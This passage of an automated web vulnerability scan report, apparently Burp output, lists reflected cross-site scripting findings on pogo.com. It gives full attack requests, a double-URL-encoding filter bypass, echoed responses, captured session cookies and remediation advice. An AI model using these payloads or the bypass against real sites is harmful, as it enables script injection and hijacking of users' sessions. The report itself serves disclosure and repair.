Cookie: com.pogo.recent=scrabble.2player.social.17fbdp; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; op600clubpogoliid=a00200200a2719m0337lk0d3e; s_sq=%5B%5BB%5D%5D; com.pogo.ga=; op600clubpogogum=a00200200a2719m0337lk0d3e; com.pogo.unid=6606480040153856; com.pogo.nsc=age.:sort.favdown:va.false:scrabble.2player.beginner:; s_cc=true; com.pogo.lkey=TRB7pR5Zmd6Ko2z1Cn4zUAAAKMQ.; s_pers=%20s_nr%3D1294536931722-New%7C1297128931722%3B; com.pogo.supressGiftLayer=; prod.JID=269399119AD6ABD961A8F9470FD2EF87.000161; com.pogo.site=pogo; com.pogo.info=1A06DD6489046E8C5400B01BCDC200C5C740894EE1C1D54B9D6337ECAA3BC8AA9E96C90EB8BD479A84B5EAE5F7FFE0276A4654905B9B0F27BA3BCEA9A972CD5BBA61610C9A8736A7BE0F37B01924BD04B761D877642A78CFB4C56CAE924D0222579F2238A5B7AFDCAF21A40BDF3AD46495DF9940B114E1282F07B75AC2B359A34804B80F2900E0845400B01BCDC200C5C740894EE1C1D54B9D6337ECAA3BC8AA9E96C90EB8BD479A84B5EAE5F7FFE0276A4654905B9B0F27BA3BCEA9A972CD5BBA61610C9A8736A7BE0F37B01924BD04C8EBFDFE586AD587680A170C3EDC161B48B80C858E980A71; com.pogo.hp.ls.cfg=0; com.pogo.tafrcode=;

Response (redirected)

3.609. http://www.pogo.com/home/home.jsp [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.pogo.com
Path:	/home/home.jsp

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f9258"><script>alert(1)</script>4225969d669 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /home/home.jsp?f9258"><script>alert(1)</script>4225969d669=1 HTTP/1.1
Host: www.pogo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Expires: 0
Cache-Control: max-age=0, private
Set-Cookie: prod.JID=DBFBE7E5DB27E8444071339BA4CA19A0.000195; Domain=.pogo.com; Path=/
Content-Language: en-US
Set-Cookie: com.pogo.unid=6606578824406775; Domain=.pogo.com; Expires=Fri, 08-Jan-2016 01:20:36 GMT; Path=/
Set-Cookie: com.pogo.supressGiftLayer=; Domain=.pogo.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/home
Content-Type: text/html;charset=UTF-8
Date: Sun, 09 Jan 2011 01:20:36 GMT
Server: Apache-Coyote/1.1
Content-Length: 429448

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.
...[SNIP]...
<link rel="canonical" href="http://www.pogo.com/?f9258"><script>alert(1)</script>4225969d669=1"/>
...[SNIP]...

3.610. http://www.pogo.com/hotdeploy/us/homepage/clubpogo-info.jsp [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.pogo.com
Path:	/hotdeploy/us/homepage/clubpogo-info.jsp

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5a423</script><script>alert(1)</script>2d1ef703044 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Request

GET /hotdeploy/us/homepage/clubpogo-info.jsp?5a423</script><script>alert(1)</script>2d1ef703044=1 HTTP/1.1
Host: www.pogo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: com.pogo.recent=scrabble.2player.social.17fbdp; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; op600clubpogoliid=a00200200a2719m0337lk0d3e; s_sq=%5B%5BB%5D%5D; com.pogo.ga=; op600clubpogogum=a00200200a2719m0337lk0d3e; com.pogo.unid=6606480040153856; com.pogo.nsc=age.:sort.favdown:va.false:scrabble.2player.beginner:; s_cc=true; com.pogo.lkey=TRB7pR5Zmd6Ko2z1Cn4zUAAAKMQ.; s_pers=%20s_nr%3D1294536931722-New%7C1297128931722%3B; com.pogo.supressGiftLayer=; prod.JID=269399119AD6ABD961A8F9470FD2EF87.000161; com.pogo.site=pogo; com.pogo.info=1A06DD6489046E8C5400B01BCDC200C5C740894EE1C1D54B9D6337ECAA3BC8AA9E96C90EB8BD479A84B5EAE5F7FFE0276A4654905B9B0F27BA3BCEA9A972CD5BBA61610C9A8736A7BE0F37B01924BD04B761D877642A78CFB4C56CAE924D0222579F2238A5B7AFDCAF21A40BDF3AD46495DF9940B114E1282F07B75AC2B359A34804B80F2900E0845400B01BCDC200C5C740894EE1C1D54B9D6337ECAA3BC8AA9E96C90EB8BD479A84B5EAE5F7FFE0276A4654905B9B0F27BA3BCEA9A972CD5BBA61610C9A8736A7BE0F37B01924BD04C8EBFDFE586AD587680A170C3EDC161B48B80C858E980A71; com.pogo.hp.ls.cfg=0; com.pogo.tafrcode=;

Response (redirected)

HTTP/1.1 200 OK
Expires: 0
Cache-Control: max-age=0, private
Content-Language: en-US
Content-Type: text/html;charset=UTF-8
Date: Sun, 09 Jan 2011 03:00:41 GMT
Server: Apache-Coyote/1.1
Content-Length: 26833

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-e
...[SNIP]...
p6,' }
}
if (s.linkTrackEvents != 'None') {s.linkTrackVars=s.linkTrackVars + 'events';}
s.tl(source,'o',pageName);
}
s.referrer="http://www.pogo.com/hotdeploy/us/homepage/clubpogo-info.jsp?5a423</script><script>alert(1)</script>2d1ef703044=1";
s.eVar2="pogo";
s.pageName="ClubPogo.com 5by5 0708 US page";
s.prop2="pogo";
s.channel="pogo";
s.prop7="POGO:pogo:marketing::ClubPogo.com 5by5 0708 US page:Non Authenticated";
s.prop8="Non Authent
...[SNIP]...

3.611. http://www.pogo.com/hotdeploy/us/homepage/clubpogo-info.jsp [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.pogo.com
Path:	/hotdeploy/us/homepage/clubpogo-info.jsp

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9eadd"><script>alert(1)</script>5428e23fbf7 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /hotdeploy/us/homepage/clubpogo-info.jsp?9eadd"><script>alert(1)</script>5428e23fbf7=1 HTTP/1.1
Host: www.pogo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: com.pogo.recent=scrabble.2player.social.17fbdp; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; op600clubpogoliid=a00200200a2719m0337lk0d3e; s_sq=%5B%5BB%5D%5D; com.pogo.ga=; op600clubpogogum=a00200200a2719m0337lk0d3e; com.pogo.unid=6606480040153856; com.pogo.nsc=age.:sort.favdown:va.false:scrabble.2player.beginner:; s_cc=true; com.pogo.lkey=TRB7pR5Zmd6Ko2z1Cn4zUAAAKMQ.; s_pers=%20s_nr%3D1294536931722-New%7C1297128931722%3B; com.pogo.supressGiftLayer=; prod.JID=269399119AD6ABD961A8F9470FD2EF87.000161; com.pogo.site=pogo; com.pogo.info=1A06DD6489046E8C5400B01BCDC200C5C740894EE1C1D54B9D6337ECAA3BC8AA9E96C90EB8BD479A84B5EAE5F7FFE0276A4654905B9B0F27BA3BCEA9A972CD5BBA61610C9A8736A7BE0F37B01924BD04B761D877642A78CFB4C56CAE924D0222579F2238A5B7AFDCAF21A40BDF3AD46495DF9940B114E1282F07B75AC2B359A34804B80F2900E0845400B01BCDC200C5C740894EE1C1D54B9D6337ECAA3BC8AA9E96C90EB8BD479A84B5EAE5F7FFE0276A4654905B9B0F27BA3BCEA9A972CD5BBA61610C9A8736A7BE0F37B01924BD04C8EBFDFE586AD587680A170C3EDC161B48B80C858E980A71; com.pogo.hp.ls.cfg=0; com.pogo.tafrcode=;

Response (redirected)

HTTP/1.1 200 OK
Expires: 0
Cache-Control: max-age=0, private
Content-Language: en-US
Content-Type: text/html;charset=UTF-8
Date: Sun, 09 Jan 2011 03:00:40 GMT
Server: Apache-Coyote/1.1
Content-Length: 26822

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-e
...[SNIP]...
<link rel="canonical" href="http://www.pogo.com/club-pogo?9eadd"><script>alert(1)</script>5428e23fbf7=1"/>
...[SNIP]...

3.612. http://www.pogo.com/hotdeploy/us/promotions/marketing/bgca/landing-page.jsp [&intcmp parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.pogo.com
Path:	/hotdeploy/us/promotions/marketing/bgca/landing-page.jsp

Issue detail

The value of the &intcmp request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 70262%253c%252fscript%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e02cc5d04880 was submitted in the &intcmp parameter. This input was echoed as 70262</script><script>alert(1)</script>02cc5d04880 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of the &intcmp request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /hotdeploy/us/promotions/marketing/bgca/landing-page.jsp?&intcmp=fp_mtx_mb_minis_170262%253c%252fscript%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e02cc5d04880&pageSection=free_home_mtx_shopping HTTP/1.1
Host: www.pogo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: com.pogo.recent=scrabble.2player.social.17fbdp; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; op600clubpogoliid=a00200200a2719m0337lk0d3e; s_sq=%5B%5BB%5D%5D; com.pogo.ga=; op600clubpogogum=a00200200a2719m0337lk0d3e; com.pogo.unid=6606480040153856; com.pogo.nsc=age.:sort.favdown:va.false:scrabble.2player.beginner:; s_cc=true; com.pogo.lkey=TRB7pR5Zmd6Ko2z1Cn4zUAAAKMQ.; s_pers=%20s_nr%3D1294536931722-New%7C1297128931722%3B; com.pogo.supressGiftLayer=; prod.JID=269399119AD6ABD961A8F9470FD2EF87.000161; com.pogo.site=pogo; com.pogo.info=1A06DD6489046E8C5400B01BCDC200C5C740894EE1C1D54B9D6337ECAA3BC8AA9E96C90EB8BD479A84B5EAE5F7FFE0276A4654905B9B0F27BA3BCEA9A972CD5BBA61610C9A8736A7BE0F37B01924BD04B761D877642A78CFB4C56CAE924D0222579F2238A5B7AFDCAF21A40BDF3AD46495DF9940B114E1282F07B75AC2B359A34804B80F2900E0845400B01BCDC200C5C740894EE1C1D54B9D6337ECAA3BC8AA9E96C90EB8BD479A84B5EAE5F7FFE0276A4654905B9B0F27BA3BCEA9A972CD5BBA61610C9A8736A7BE0F37B01924BD04C8EBFDFE586AD587680A170C3EDC161B48B80C858E980A71; com.pogo.hp.ls.cfg=0; com.pogo.tafrcode=;

Response

HTTP/1.1 200 OK
Expires: 0
Cache-Control: max-age=0, private
Content-Language: en-US
Content-Type: text/html;charset=UTF-8
Date: Sun, 09 Jan 2011 02:59:52 GMT
Server: Apache-Coyote/1.1
Content-Length: 20636

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Con
...[SNIP]...
%253c%252fscript%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e02cc5d04880";
s.referrer="http://www.pogo.com/hotdeploy/us/promotions/marketing/bgca/landing-page.jsp?&intcmp=fp_mtx_mb_minis_170262</script><script>alert(1)</script>02cc5d04880&pageSection=free_home_mtx_shopping";
s.eVar2="pogo";
s.pageName="Boys & Girls Clubs of America";
s.prop2="pogo";
s.channel="pogo";
s.eVar18="un_free_home_mtx_shopping";
s.prop7="POGO:pogo:marketing::B
...[SNIP]...

3.613. http://www.pogo.com/hotdeploy/us/promotions/marketing/bgca/landing-page.jsp [intcmp parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.pogo.com
Path:	/hotdeploy/us/promotions/marketing/bgca/landing-page.jsp

Issue detail

The value of the intcmp request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 75c88%253c%252fscript%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e723870b2cf6 was submitted in the intcmp parameter. This input was echoed as 75c88</script><script>alert(1)</script>723870b2cf6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of the intcmp request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /hotdeploy/us/promotions/marketing/bgca/landing-page.jsp?intcmp=fp_mtx_mb_minis_275c88%253c%252fscript%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e723870b2cf6&pageSection=free_home_mtx_shopping HTTP/1.1
Host: www.pogo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: com.pogo.recent=scrabble.2player.social.17fbdp; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; op600clubpogoliid=a00200200a2719m0337lk0d3e; s_sq=%5B%5BB%5D%5D; com.pogo.ga=; op600clubpogogum=a00200200a2719m0337lk0d3e; com.pogo.unid=6606480040153856; com.pogo.nsc=age.:sort.favdown:va.false:scrabble.2player.beginner:; s_cc=true; com.pogo.lkey=TRB7pR5Zmd6Ko2z1Cn4zUAAAKMQ.; s_pers=%20s_nr%3D1294536931722-New%7C1297128931722%3B; com.pogo.supressGiftLayer=; prod.JID=269399119AD6ABD961A8F9470FD2EF87.000161; com.pogo.site=pogo; com.pogo.info=1A06DD6489046E8C5400B01BCDC200C5C740894EE1C1D54B9D6337ECAA3BC8AA9E96C90EB8BD479A84B5EAE5F7FFE0276A4654905B9B0F27BA3BCEA9A972CD5BBA61610C9A8736A7BE0F37B01924BD04B761D877642A78CFB4C56CAE924D0222579F2238A5B7AFDCAF21A40BDF3AD46495DF9940B114E1282F07B75AC2B359A34804B80F2900E0845400B01BCDC200C5C740894EE1C1D54B9D6337ECAA3BC8AA9E96C90EB8BD479A84B5EAE5F7FFE0276A4654905B9B0F27BA3BCEA9A972CD5BBA61610C9A8736A7BE0F37B01924BD04C8EBFDFE586AD587680A170C3EDC161B48B80C858E980A71; com.pogo.hp.ls.cfg=0; com.pogo.tafrcode=;

Response

HTTP/1.1 200 OK
Expires: 0
Cache-Control: max-age=0, private
Content-Language: en-US
Content-Type: text/html;charset=UTF-8
Date: Sun, 09 Jan 2011 03:00:19 GMT
Server: Apache-Coyote/1.1
Content-Length: 20634

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Con
...[SNIP]...
8%253c%252fscript%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e723870b2cf6";
s.referrer="http://www.pogo.com/hotdeploy/us/promotions/marketing/bgca/landing-page.jsp?intcmp=fp_mtx_mb_minis_275c88</script><script>alert(1)</script>723870b2cf6&pageSection=free_home_mtx_shopping";
s.eVar2="pogo";
s.pageName="Boys & Girls Clubs of America";
s.prop2="pogo";
s.channel="pogo";
s.eVar18="un_free_home_mtx_shopping";
s.prop7="POGO:pogo:marketing::B
...[SNIP]...

3.614. http://www.pogo.com/hotdeploy/us/promotions/marketing/bgca/landing-page.jsp [pageSection parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.pogo.com
Path:	/hotdeploy/us/promotions/marketing/bgca/landing-page.jsp

Issue detail

The value of the pageSection request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3c915%253c%252fscript%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e4cf12ef1b83 was submitted in the pageSection parameter. This input was echoed as 3c915</script><script>alert(1)</script>4cf12ef1b83 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of the pageSection request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /hotdeploy/us/promotions/marketing/bgca/landing-page.jsp?&intcmp=fp_mtx_mb_minis_1&pageSection=free_home_mtx_shopping3c915%253c%252fscript%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e4cf12ef1b83 HTTP/1.1
Host: www.pogo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: com.pogo.recent=scrabble.2player.social.17fbdp; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; op600clubpogoliid=a00200200a2719m0337lk0d3e; s_sq=%5B%5BB%5D%5D; com.pogo.ga=; op600clubpogogum=a00200200a2719m0337lk0d3e; com.pogo.unid=6606480040153856; com.pogo.nsc=age.:sort.favdown:va.false:scrabble.2player.beginner:; s_cc=true; com.pogo.lkey=TRB7pR5Zmd6Ko2z1Cn4zUAAAKMQ.; s_pers=%20s_nr%3D1294536931722-New%7C1297128931722%3B; com.pogo.supressGiftLayer=; prod.JID=269399119AD6ABD961A8F9470FD2EF87.000161; com.pogo.site=pogo; com.pogo.info=1A06DD6489046E8C5400B01BCDC200C5C740894EE1C1D54B9D6337ECAA3BC8AA9E96C90EB8BD479A84B5EAE5F7FFE0276A4654905B9B0F27BA3BCEA9A972CD5BBA61610C9A8736A7BE0F37B01924BD04B761D877642A78CFB4C56CAE924D0222579F2238A5B7AFDCAF21A40BDF3AD46495DF9940B114E1282F07B75AC2B359A34804B80F2900E0845400B01BCDC200C5C740894EE1C1D54B9D6337ECAA3BC8AA9E96C90EB8BD479A84B5EAE5F7FFE0276A4654905B9B0F27BA3BCEA9A972CD5BBA61610C9A8736A7BE0F37B01924BD04C8EBFDFE586AD587680A170C3EDC161B48B80C858E980A71; com.pogo.hp.ls.cfg=0; com.pogo.tafrcode=;

Response

HTTP/1.1 200 OK
Expires: 0
Cache-Control: max-age=0, private
Content-Language: en-US
Content-Type: text/html;charset=UTF-8
Date: Sun, 09 Jan 2011 02:59:52 GMT
Server: Apache-Coyote/1.1
Content-Length: 20636

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Con
...[SNIP]...
source,'o',pageName);
}
s.eVar5="fp_mtx_mb_minis_1";
s.referrer="http://www.pogo.com/hotdeploy/us/promotions/marketing/bgca/landing-page.jsp?&intcmp=fp_mtx_mb_minis_1&pageSection=free_home_mtx_shopping3c915</script><script>alert(1)</script>4cf12ef1b83";
s.eVar2="pogo";
s.pageName="Boys & Girls Clubs of America";
s.prop2="pogo";
s.channel="pogo";
s.eVar18="un_free_home_mtx_shopping3c915%253c%252fscript%253e%253cscript%253ealert%25281%2529%253c%252fs
...[SNIP]...

3.615. http://www.pogo.com/hotdeploy/us/promotions/marketing/pogoiphone/landing-page.jsp [pageSection parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.pogo.com
Path:	/hotdeploy/us/promotions/marketing/pogoiphone/landing-page.jsp

Issue detail

The value of the pageSection request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c79ff%253c%252fscript%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e42a5d9a0e0d was submitted in the pageSection parameter. This input was echoed as c79ff</script><script>alert(1)</script>42a5d9a0e0d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of the pageSection request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /hotdeploy/us/promotions/marketing/pogoiphone/landing-page.jsp?pageSection=homnav_iphonec79ff%253c%252fscript%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e42a5d9a0e0d HTTP/1.1
Host: www.pogo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: com.pogo.recent=scrabble.2player.social.17fbdp; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; op600clubpogoliid=a00200200a2719m0337lk0d3e; s_sq=%5B%5BB%5D%5D; com.pogo.ga=; op600clubpogogum=a00200200a2719m0337lk0d3e; com.pogo.unid=6606480040153856; com.pogo.nsc=age.:sort.favdown:va.false:scrabble.2player.beginner:; s_cc=true; com.pogo.lkey=TRB7pR5Zmd6Ko2z1Cn4zUAAAKMQ.; s_pers=%20s_nr%3D1294536931722-New%7C1297128931722%3B; com.pogo.supressGiftLayer=; prod.JID=269399119AD6ABD961A8F9470FD2EF87.000161; com.pogo.site=pogo; com.pogo.info=1A06DD6489046E8C5400B01BCDC200C5C740894EE1C1D54B9D6337ECAA3BC8AA9E96C90EB8BD479A84B5EAE5F7FFE0276A4654905B9B0F27BA3BCEA9A972CD5BBA61610C9A8736A7BE0F37B01924BD04B761D877642A78CFB4C56CAE924D0222579F2238A5B7AFDCAF21A40BDF3AD46495DF9940B114E1282F07B75AC2B359A34804B80F2900E0845400B01BCDC200C5C740894EE1C1D54B9D6337ECAA3BC8AA9E96C90EB8BD479A84B5EAE5F7FFE0276A4654905B9B0F27BA3BCEA9A972CD5BBA61610C9A8736A7BE0F37B01924BD04C8EBFDFE586AD587680A170C3EDC161B48B80C858E980A71; com.pogo.hp.ls.cfg=0; com.pogo.tafrcode=;

Response

HTTP/1.1 200 OK
Expires: 0
Cache-Control: max-age=0, private
Content-Language: en-US
Content-Type: text/html;charset=UTF-8
Date: Sun, 09 Jan 2011 02:59:38 GMT
Server: Apache-Coyote/1.1
Content-Length: 21628

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Co
...[SNIP]...
') {s.linkTrackVars=s.linkTrackVars + 'events';}
s.tl(source,'o',pageName);
}
s.referrer="http://www.pogo.com/hotdeploy/us/promotions/marketing/pogoiphone/landing-page.jsp?pageSection=homnav_iphonec79ff</script><script>alert(1)</script>42a5d9a0e0d";
s.eVar2="pogo";
s.pageName="Pogo iPhone Landing Page";
s.prop2="pogo";
s.channel="pogo";
s.eVar18="un_homnav_iphonec79ff%253c%252fscript%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e42a5
...[SNIP]...

3.616. http://www.pogo.com/prize/prize.do [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.pogo.com
Path:	/prize/prize.do

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 15d82"><script>alert(1)</script>a5d2698d48f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /prize/prize.do?pageSection=footer_prize&15d82"><script>alert(1)</script>a5d2698d48f=1 HTTP/1.1
Host: www.pogo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: com.pogo.recent=scrabble.2player.social.17fbdp; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; op600clubpogoliid=a00200200a2719m0337lk0d3e; s_sq=%5B%5BB%5D%5D; com.pogo.ga=; op600clubpogogum=a00200200a2719m0337lk0d3e; com.pogo.unid=6606480040153856; com.pogo.nsc=age.:sort.favdown:va.false:scrabble.2player.beginner:; s_cc=true; com.pogo.lkey=TRB7pR5Zmd6Ko2z1Cn4zUAAAKMQ.; s_pers=%20s_nr%3D1294536931722-New%7C1297128931722%3B; com.pogo.supressGiftLayer=; prod.JID=269399119AD6ABD961A8F9470FD2EF87.000161; com.pogo.site=pogo; com.pogo.info=1A06DD6489046E8C5400B01BCDC200C5C740894EE1C1D54B9D6337ECAA3BC8AA9E96C90EB8BD479A84B5EAE5F7FFE0276A4654905B9B0F27BA3BCEA9A972CD5BBA61610C9A8736A7BE0F37B01924BD04B761D877642A78CFB4C56CAE924D0222579F2238A5B7AFDCAF21A40BDF3AD46495DF9940B114E1282F07B75AC2B359A34804B80F2900E0845400B01BCDC200C5C740894EE1C1D54B9D6337ECAA3BC8AA9E96C90EB8BD479A84B5EAE5F7FFE0276A4654905B9B0F27BA3BCEA9A972CD5BBA61610C9A8736A7BE0F37B01924BD04C8EBFDFE586AD587680A170C3EDC161B48B80C858E980A71; com.pogo.hp.ls.cfg=0; com.pogo.tafrcode=;

Response

HTTP/1.1 200 OK
Expires: 0
Cache-Control: max-age=0, private
Content-Language: en-US
Content-Type: text/html;charset=UTF-8
Date: Sun, 09 Jan 2011 03:03:45 GMT
Server: Apache-Coyote/1.1
Content-Length: 25638

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.
...[SNIP]...
<link rel="canonical" href="http://www.pogo.com/prize/prize.do?15d82"><script>alert(1)</script>a5d2698d48f=1"/>
...[SNIP]...

3.617. http://www.pogo.com/prize/prize.do [pageSection parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.pogo.com
Path:	/prize/prize.do

Issue detail

The value of the pageSection request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8b79d%253c%252fscript%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e28f760955af was submitted in the pageSection parameter. This input was echoed as 8b79d</script><script>alert(1)</script>28f760955af in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of the pageSection request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /prize/prize.do?pageSection=footer_prize8b79d%253c%252fscript%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e28f760955af HTTP/1.1
Host: www.pogo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
